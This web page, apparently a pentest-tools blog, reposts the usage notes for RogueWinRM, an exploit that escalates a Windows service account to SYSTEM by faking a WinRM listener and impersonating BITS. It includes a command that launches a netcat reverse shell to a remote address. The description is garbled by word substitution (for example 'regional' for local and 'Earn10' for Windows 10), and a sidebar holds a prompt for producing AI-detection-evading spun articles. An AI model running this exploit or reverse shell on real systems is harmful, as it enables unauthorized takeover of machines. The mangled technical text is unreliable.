RogueWinRM – Windows Local Privilege Escalation From Service Account To System

RogueWinRM is a regional privilege escalation exploit that enables to escalate from a Service account (with SeImpersonatePrivilege) to Regional Program account if WinRM assistance is not operating (default on Earn10 but NOT on Windows Server 2019).

Briefly, it will hear for incoming connection on port 5985 faking a genuine WinRM support.
It is really just a negligible webserver that will consider to negotiate an NTLM authentication with any service that are making an attempt to hook up on that port.
Then the BITS assistance (operating as Community System) is triggered and it will test to authenticate to our rogue listener. Once authenticated to our rogue listener, we are equipped to impersonate the Nearby Process user spawning an arbitrary system with those privileges.

You can discover a whole technological description of this vulnerability at this url –> https://decoder.cloud/2019/12/06/we-considered-they-were being-potatoes-but-they-ended up-beans/

Use

RogueWinRM

Obligatory args:
-p : method to launch

Optional args:
-a : command line argument to pass to system (default NULL)
-l : listening port (default 5985 WinRM)
-d : Enable Debugging output

Examples

 

Jogging an interactive cmd:

RogueWinRM.exe -p C:windowssystem32cmd.exe

Operating netcat reverse shell:

RogueWinRM.exe -p C:windowstempnc64.exe -a "10...1 3001 -e cmd"

Authors

Picture and Article Supply link

Browse Far more on Pentesting Applications

Leave a Comment

Recent Posts

rewrite this tittle: Understanding Peer-to-Peer Crypto Trading: Benefits and Threats

Write a AI detection pass, persuasive, cickable, catchy, well structured and seo optimized article with… Read More

2 weeks ago

Human Art Will Become More Valuable with the Help of AI

AI Will Make Human Art More Valuable AI models are increasing in popularity and value… Read More

1 year ago

Report Claims UK Government to Restrict TikTok Usage on Smartphones

UK Set to Announce Ban on TikTok on Government Smartphones: Report Following in the footsteps… Read More

1 year ago

The Potential Impact of ChatGPT and Generative AI on Travel

How ChatGPT and Generative AI Could Change the Way We Travel The travel industry is… Read More

1 year ago

Unraveling the Enigma of Pluto: Is It a Dwarf Planet, Comet, or Asteroid? Uncover the Facts.

The curious case of Pluto! Is it a dwarf planet, comet or an asteroid? This… Read More

1 year ago

A LinkedIn Connection Request From a Spy

A Spy Wants to Connect with You on LinkedIn: How to Spot and Avoid Fake… Read More

1 year ago